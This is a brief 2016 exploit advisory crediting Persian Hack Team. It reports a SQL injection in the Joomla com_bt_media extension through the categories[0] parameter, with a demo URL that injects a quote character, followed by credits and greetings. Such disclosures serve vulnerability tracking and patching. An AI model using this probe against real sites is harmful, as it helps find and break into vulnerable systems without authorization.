26 lines
No EOL
704 B
Text
26 lines
No EOL
704 B
Text
######################
|
|
# Exploit Title : Joomla com_bt_media - SQL Injection
|
|
# Exploit Author : Persian Hack Team
|
|
# Vendor Homepage : http://extensions.joomla.org/extension/bt-media-gallery
|
|
# Category: [ Webapps ]
|
|
# Tested on: [ Win ]
|
|
# Version: 1.0
|
|
# Date: 2016/06/19
|
|
######################
|
|
#
|
|
# PoC:
|
|
|
|
# categories[0]= Parameter Vulnerable To SQL
|
|
|
|
# Demo :
|
|
|
|
# http://server/index.php?option=com_bt_media&view=list&categories[0]=%277&Itemid=134
|
|
|
|
|
|
# Please Free Yaser Ebrahimi
|
|
|
|
######################
|
|
# Discovered by : Mojtaba MobhaM
|
|
# Greetz : T3NZOG4N & FireKernel & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
|
|
# Homepage : persian-team.ir
|
|
###################### |